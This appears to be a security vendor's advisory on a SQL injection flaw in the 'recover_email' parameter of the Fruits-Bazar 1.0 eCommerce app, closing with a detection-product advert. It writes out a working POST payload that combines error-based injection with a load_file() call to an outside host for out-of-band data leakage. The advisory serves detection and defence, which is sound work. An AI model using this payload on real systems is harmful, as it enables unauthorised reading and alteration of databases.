Fruits-Bazar 2021 1.0 'recover_email' SQL Injection



Application Details

Fruits-Bazar is an eCommerce project developed using PHP, JavaScript, JQuery, and MySQL.


Vulnerability

Fruits-Bazar is vulnerable to SQL injection.


Identification

A remote attacker could send specially crafted SQL statements using the 'recover_email' parameter, which could allow the attacker to view, add, modify or delete information in the back-end database.


POST /index.php
PAYLOAD - recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net' (select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg')) '' AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mvga'='Mvga&u_pass_recover=Recover Password


Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to influence the vulnerable parameter with SQL injections.


Coverage

Idappcom has created signature 8022835 along with a traffic file.


References

Fruits-Bazar 2021 1.0 SQL Injection - Packet Storm Security

Fruits-Bazar recover_email SQL injection - XForce


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability, or others, why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional